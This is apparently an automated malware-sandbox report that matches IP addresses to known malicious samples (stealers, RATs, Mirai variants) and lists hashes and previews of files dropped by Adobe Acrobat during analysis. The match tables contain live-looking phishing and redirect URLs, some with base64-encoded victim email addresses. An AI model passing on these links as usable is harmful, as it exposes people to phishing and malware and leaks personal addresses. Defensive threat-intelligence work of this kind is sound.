                                                                        bg.microsoft.map.fastly.netfes.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                        • 199.232.210.172
                                                                        PvsaLvk7xD.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.232.210.172
                                                                        Belegdetails Nr378-938-027181-PDF.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                        • 199.232.210.172
                                                                        4z0JKnfc8L.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        K1_Chit_Form.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 199.232.210.172
                                                                        y0FrwmkdQU.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 199.232.214.172
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 199.232.210.172
                                                                        MOaSkQR8WU.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        VVs9SAqm5N.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 199.232.214.172
                                                                        Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 199.232.214.172
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSfes.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                        • 104.21.68.89
                                                                        #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                                                        • 172.67.198.207
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.16.9
                                                                        Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                                                        • 172.67.146.191
                                                                        hnskldjf230.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                        • 172.65.251.78
                                                                        Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                                                        • 172.67.146.191
                                                                        3GloGaDtsG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.97.6
                                                                        #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                                                        • 104.21.13.77
                                                                        http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=Get hashmaliciousUnknownBrowse
                                                                        • 104.16.123.96
                                                                        File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                        • 104.26.13.205
                                                                        AS40676USRFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                        • 103.126.138.87
                                                                        Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                        • 103.126.138.87
                                                                        https://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20==Get hashmaliciousUnknownBrowse
                                                                        • 103.126.138.87
                                                                        Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                        • 103.126.138.87
                                                                        sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                        • 107.169.202.161
                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 23.91.0.144
                                                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 107.176.168.239
                                                                        la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                        • 107.177.38.11
                                                                        sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 104.244.155.34
                                                                        Employee_Secure_Doc.pdfGet hashmaliciousUnknownBrowse
                                                                        • 103.126.138.87
                                                                        AARNET-AS-APAustralianAcademicandResearchNetworkAARNehttps://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20==Get hashmaliciousUnknownBrowse
                                                                        • 103.160.107.138
                                                                        Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                        • 103.160.107.138
                                                                        teste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                        • 138.44.226.180
                                                                        botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 134.115.11.187
                                                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 103.163.150.205
                                                                        la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                        • 103.172.4.110
                                                                        la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                        • 134.149.200.53
                                                                        botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.166.231.231
                                                                        botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.163.150.225
                                                                        mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.182.254.136
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        28a2c9bd18a11de089ef85a160da29e4https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82Get hashmaliciousUnknownBrowse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        https://temp.farenheit.net/XWU9WdXVLQ1BPcVcwN28vNmJmQW9rZy9JbGl2YjNqdU82UXRXbjVuRDE4WHZ2S3E3MTh0U0RLVVRZRjcvL3o0M1ZEZW5HMGQ2cUJ6Q1dmd0d6MzNsK1IwNkc0c1FQTlFkODFpdjI1RE5wTTZrZjNNL2ZlNTNzb3kvbXlTenlUOC94REZCNXJyYzEwcDduQ0JYM1JvQnpTTEhpdHIzWXlMVFh3dnJkNWo5N3JWODhWWVd4MWx5T0pqcUNZQlY3ZHRFTktEUGRLRVR4czR1dTMvY282WURmWGE0TkhiSkd2dkNZOUlGWUE9PS0tVVdmbHMzdlpZZDU2aFdnMy0teWdvSnFiVklFSk13UEoyUlNUQzd4Zz09?cid=2308276595Get hashmaliciousKnowBe4Browse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=Get hashmaliciousUnknownBrowse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        https://odinling.es/sharep/sharepp/index1.html#info@securusmonitoring.comGet hashmaliciousUnknownBrowse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        4z0JKnfc8L.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 20.109.210.53
                                                                        • 13.107.246.63
                                                                        • 23.218.208.109
                                                                        No context
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):5.177858929807006
                                                                        Encrypted:false
                                                                        SSDEEP:6:T6Rq2Pwkn2nKuAl9OmbnIFUt8mkjZZmw+mkjzkwOwkn2nKuAl9OmbjLJ:2RvYfHAahFUt8pjZ/+pjz5JfHAaSJ
                                                                        MD5:5F0F57C8275B6D0FA007AB0F3C6011B0
                                                                        SHA1:4808646A553D4CE62AF67B7F8963DE5E22CC1C9B
                                                                        SHA-256:0AAD93E4DC3DE259130863A16CE119CF5EC7824179A471340BABE035276723DD
                                                                        SHA-512:EFAFEA5B9725C695A91E57A51EE877F23F0EFA4DE1A2DDD1D5D94D0A141E20526B8F553986D729A08A33015F5B632FEBDE23856FEDA636679694C19F4F1AE8E6
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:2024/12/03-11:49:22.817 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/03-11:49:22.821 1e84 Recovering log #3.2024/12/03-11:49:22.821 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):5.177858929807006
                                                                        Encrypted:false
                                                                        SSDEEP:6:T6Rq2Pwkn2nKuAl9OmbnIFUt8mkjZZmw+mkjzkwOwkn2nKuAl9OmbjLJ:2RvYfHAahFUt8pjZ/+pjz5JfHAaSJ
                                                                        MD5:5F0F57C8275B6D0FA007AB0F3C6011B0
                                                                        SHA1:4808646A553D4CE62AF67B7F8963DE5E22CC1C9B
                                                                        SHA-256:0AAD93E4DC3DE259130863A16CE119CF5EC7824179A471340BABE035276723DD
                                                                        SHA-512:EFAFEA5B9725C695A91E57A51EE877F23F0EFA4DE1A2DDD1D5D94D0A141E20526B8F553986D729A08A33015F5B632FEBDE23856FEDA636679694C19F4F1AE8E6
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:2024/12/03-11:49:22.817 1e84 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/03-11:49:22.821 1e84 Recovering log #3.2024/12/03-11:49:22.821 1e84 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):336
                                                                        Entropy (8bit):5.154583219064403
                                                                        Encrypted:false
                                                                        SSDEEP:6:TAU/Vq2Pwkn2nKuAl9Ombzo2jMGIFUt8mh7SgZmw+mCIkwOwkn2nKuAl9Ombzo23:8U/VvYfHAa8uFUt887Sg/+TI5JfHAa8z
                                                                        MD5:0E73138317D67BCF20BB8ED01C99871F
                                                                        SHA1:495EFF2ACC7FDA2F88BAE406EA71638D78F87651
                                                                        SHA-256:AE8CA5AF4F5ED0EDF0995286CA91B731F32914ED8AB1AEA7B71F8F6A55049CD5
                                                                        SHA-512:E1E428D52476F6B9B2A18A5B4645188B96BA1F81EBEA37764642BA153136B0F491D785A089E098578F9A4FEB251C487A5008E39B49B035737F70F7D588A14C48
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:2024/12/03-11:49:22.908 1f14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/03-11:49:22.909 1f14 Recovering log #3.2024/12/03-11:49:22.910 1f14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):336
                                                                        Entropy (8bit):5.154583219064403
                                                                        Encrypted:false
                                                                        SSDEEP:6:TAU/Vq2Pwkn2nKuAl9Ombzo2jMGIFUt8mh7SgZmw+mCIkwOwkn2nKuAl9Ombzo23:8U/VvYfHAa8uFUt887Sg/+TI5JfHAa8z
                                                                        MD5:0E73138317D67BCF20BB8ED01C99871F
                                                                        SHA1:495EFF2ACC7FDA2F88BAE406EA71638D78F87651
                                                                        SHA-256:AE8CA5AF4F5ED0EDF0995286CA91B731F32914ED8AB1AEA7B71F8F6A55049CD5
                                                                        SHA-512:E1E428D52476F6B9B2A18A5B4645188B96BA1F81EBEA37764642BA153136B0F491D785A089E098578F9A4FEB251C487A5008E39B49B035737F70F7D588A14C48
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:2024/12/03-11:49:22.908 1f14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/03-11:49:22.909 1f14 Recovering log #3.2024/12/03-11:49:22.910 1f14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.967403857886107
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                        MD5:B7761633048D74E3C02F61AD04E00147
                                                                        SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                        SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                        SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:modified
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.968993094732768
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sq22sBdOg2H5mcaq3QYiubInP7E4TX:Y2sRdsFbdMH5Z3QYhbG7n7
                                                                        MD5:41E59FA5E5651667B92FA9698E08A5B3
                                                                        SHA1:220881899A889FA6348213AE839A295DDB2F90EF
                                                                        SHA-256:18ADFD10C785A0F20B3DE6AB2AE0972383080F0E0C4BB84A7CAEEC5E11342D3C
                                                                        SHA-512:CEFE78E271CE122F0F2F11B7E8A299EFEBA64CBC378CFB0744A366268AAD739362A1C31119D87B6D4A85A2CF6D5FFD4059BB700A25417195D7C6413C54DD72B6
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377804571888122","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":670377},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.967403857886107
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                        MD5:B7761633048D74E3C02F61AD04E00147
                                                                        SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                        SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                        SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.967403857886107
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                        MD5:B7761633048D74E3C02F61AD04E00147
                                                                        SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                        SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                        SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4730
                                                                        Entropy (8bit):5.249910895797271
                                                                        Encrypted:false
                                                                        SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7kwVTIKp/KpsSwVZ:etJCV4FiN/jTN/2r8Mta02fEhgO73goJ
                                                                        MD5:A902E4A1EDD73FE953ECA8B7C8CC56F3
                                                                        SHA1:6E0A44D2C1AF40854083CDD05D5FCFB8475E32FB
                                                                        SHA-256:C3A1667C7925990252608E9ADF8D1FA9B72E58F367FD448957C17C8D11EC3A5D
                                                                        SHA-512:BE807030CBE52102DBEEDFB2BF1FDC0863AA25508D558908E895142B254CB7D963DFA5FEC6020B021EF7256BEEA4637F4BBB9EED7C2ED7A7EEF88849DE5EF231
                                                                        Malicious:false
                                                                        Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):324
                                                                        Entropy (8bit):5.1684112607065975
                                                                        Encrypted:false
                                                                        SSDEEP:6:4Vq2Pwkn2nKuAl9OmbzNMxIFUt8j2gZmw+NSIkwOwkn2nKuAl9OmbzNMFLJ:4VvYfHAa8jFUt8qg/+AI5JfHAa84J
                                                                        MD5:6090A500F3156415B45223FC532DF390
                                                                        SHA1:235EBD75902FD5EF04C8117108A20F19742DAA76
                                                                        SHA-256:DB531EA87A677CD3A4164EB4793159CE64144AB099F07F15617BC16E035E8565
                                                                        SHA-512:48BF28DB7F06FC934526CAED551BD27D03776753BD179C833F77F995B7358BF7F07ACA1877B0CAD974C8F604B8AD9B9376E1D54FA72538CABAE884C4C4F7B1B3
                                                                        Malicious:false
                                                                        Preview:2024/12/03-11:49:23.188 1f14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/03-11:49:23.198 1f14 Recovering log #3.2024/12/03-11:49:23.211 1f14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):324
                                                                        Entropy (8bit):5.1684112607065975
                                                                        Encrypted:false
                                                                        SSDEEP:6:4Vq2Pwkn2nKuAl9OmbzNMxIFUt8j2gZmw+NSIkwOwkn2nKuAl9OmbzNMFLJ:4VvYfHAa8jFUt8qg/+AI5JfHAa84J
                                                                        MD5:6090A500F3156415B45223FC532DF390
                                                                        SHA1:235EBD75902FD5EF04C8117108A20F19742DAA76
                                                                        SHA-256:DB531EA87A677CD3A4164EB4793159CE64144AB099F07F15617BC16E035E8565
                                                                        SHA-512:48BF28DB7F06FC934526CAED551BD27D03776753BD179C833F77F995B7358BF7F07ACA1877B0CAD974C8F604B8AD9B9376E1D54FA72538CABAE884C4C4F7B1B3
                                                                        Malicious:false
                                                                        Preview:2024/12/03-11:49:23.188 1f14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/03-11:49:23.198 1f14 Recovering log #3.2024/12/03-11:49:23.211 1f14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                        Category:dropped
                                                                        Size (bytes):65110
                                                                        Entropy (8bit):1.0127460183113661
                                                                        Encrypted:false
                                                                        SSDEEP:96:bOW8ccGKgCEy5ZaNIaq10ksUMQkTYDV44ebKqUaj3RtcYha4da/I8F5t:bOW8ccDvLe2sUMQkTU4bnPrcYU/hZ
                                                                        MD5:37098D22D6B68F68F6B8C47F2EE6675A
                                                                        SHA1:2464F537EA38542054001CEAEA738D8218244280
                                                                        SHA-256:54CC12FBCEA887F9A39464A9A1BFE3C1EA81ED265496ADD599DC43AEDF9AF4CD
                                                                        SHA-512:422234D335BFBE284BE6431F0812360779FB8B18A7B2CF03E738BD449EB61379126C078F4858C59C220FD0150DE9D76711796EEF2E7688FC1D14629114EF01EA
                                                                        Malicious:false
                                                                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                        Category:dropped
                                                                        Size (bytes):86016
                                                                        Entropy (8bit):4.445195931211056
                                                                        Encrypted:false
                                                                        SSDEEP:384:yezci5tOiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rhs3OazzU89UTTgUL
                                                                        MD5:2DD6ABD5B881A490D12F7D2936062E62
                                                                        SHA1:1ED0E10E7839C80F1256DD12291D0F211F0CF3A0
                                                                        SHA-256:BCCB71EEE8C54C045E4A5E82275C59F652D3EFB3A31FD95F4A3C64B10BD5995B
                                                                        SHA-512:297121657DC67F086CD3F464323D1EAE193A2C3CA25B3AEE1AE5B7B39CDB384506049AC60F6764D0510CD1C2E27E7B142651119CB51B6AA75E74FB65F07F46C1
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite Rollback Journal
                                                                        Category:dropped
                                                                        Size (bytes):8720
                                                                        Entropy (8bit):3.77690661362411
                                                                        Encrypted:false
                                                                        SSDEEP:48:7M/p/E2ioyV1ioy9oWoy1Cwoy1xKOioy1noy1AYoy1Wioy1hioybioyJoy1noy1P:7Ipju1FYXKQMlpb9IVXEBodRBkr
                                                                        MD5:DDD59EFFAF924FEADD3BA45508C128D1
                                                                        SHA1:70828F676877D14FF11CDC0601DDB92900DF0D4C
                                                                        SHA-256:66FC1CB901C25E853D65BC11203CB415C4D76A11EE4097C6984CEAF82DEA476B
                                                                        SHA-512:CDA1F989E616F9A9A4C4045C48E096639051E435824946D377D98BF6FD61516ACB5F8C47A3490D22A24B3A100D455E56798A64FEA1B1D7C3AFBD1419D0CF91E5
                                                                        Malicious:false
                                                                        Preview:.... .c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:Certificate, Version=3
                                                                        Category:dropped
                                                                        Size (bytes):1391
                                                                        Entropy (8bit):7.705940075877404
                                                                        Encrypted:false
                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                        Malicious:false
                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):71954
                                                                        Entropy (8bit):7.996617769952133
                                                                        Encrypted:true
                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                        Malicious:false
